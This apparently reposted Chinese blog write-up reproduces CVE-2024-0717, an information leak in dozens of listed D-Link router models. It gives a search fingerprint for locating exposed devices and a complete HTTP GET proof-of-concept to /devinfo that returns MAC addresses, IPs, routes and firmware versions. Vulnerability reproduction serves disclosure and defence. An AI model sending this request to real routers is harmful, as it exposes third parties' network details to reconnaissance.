漏洞复现-CVE-2024-0717

admin 2024年3月11日07:21:26评论67 views字数 1292阅读4分18秒阅读模式
免责声明
文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!

一:漏洞描述

D-Link 成立于1986年,总部位于台湾,是全球领先的网络设备制造商。他们提供各种网络产品和解决方案,包括路由器、交换机、摄像头、存储设备等,适用于个人用户、企业和运营商。该产品存在信息泄露漏洞。

该漏洞影响了/devinfo文件的HTTP GET请求处理组件中的未知代码。通过操作输入参数notice|net|version的区域,允许攻击者通过指定命令来检索敏感信息,例如设备 MAC 地址、IP 地址、路由详细信息、设备区域、版本号等。

二:漏洞影响版本

DIR-825ACG1、DIR-841、DIR-1260、DIR-822、DIR-X1530、DIR-825、DIR-615、DIR-842、DIR-853、DIR-1210、DIR-806A、DIR-815、DSL-245GR、DSL-G2452GR、DIR-878、 DIR-825ACF、DIR-615T、DIR-300、DIR-842S、DIR-815S、DSL-2640U、DIR-2150、DWR-921、DIR-615S、DIR-620、DVG-5402G、DIR-882、DWM-312W、DIR-815/AC、DSL-224、DWM-321、DIR-X1860、DAP-1360、DIR-820、DIR-843、DVG-5402G/GFRU、DWR-953、DVG-N5402G/IL、DIR-825AC、DIR-620S、DVG-N5402G、Good Line Router v2、DSL-2750U、DIR-615GF、DIR-816

三:网络空间测绘查询

"admin/templates/body.tpl.html"

漏洞复现-CVE-2024-0717

漏洞复现-CVE-2024-0717

五:漏洞复现

POC:

GET /devinfo?area=notice|net|version HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7

漏洞复现-CVE-2024-0717

六:批量检测

漏洞复现-CVE-2024-0717

原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-0717

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月11日07:21:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2024-0717https://cn-sec.com/archives/2565104.html

发表评论

匿名网友 填写信息